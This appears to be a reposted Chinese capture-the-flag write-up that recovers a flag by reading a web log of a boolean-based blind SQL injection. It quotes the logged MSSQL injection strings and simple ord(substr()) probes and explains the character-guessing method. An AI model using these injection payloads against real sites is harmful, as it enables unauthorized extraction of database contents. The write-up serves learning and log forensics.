[Misc ]bw 注入过程 150

本文通过解析一段SQL盲注攻击的日志,展示了如何利用布尔型盲注获取flag的过程。通过对日志中出现的SQL查询语句进行分析,可以确定flag的具体值,并了解盲注攻击的基本原理。

下下来一个日志,先解码

搜索flag,在尾部发现布尔型盲注的日志:

id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),1,1))>32 80 - 192.168.1.101 200 0 0

id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),1,1))>56 80 - 192.168.1.101 500 0 0

 

?id =1 and (select ord(substr(flag,1,1)) from flag)>96

?id =1 and (select ord(substr(flag,1,1)) from flag)>97 

学sql注入的时候猜字段,比如说>96的 时候是true 而>97是false,那么说明这个字符的ASCII值就是97

在日志里提取出flag,然后依次分析。

转载于:https://www.cnblogs.com/rookieDanny/p/8590502.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值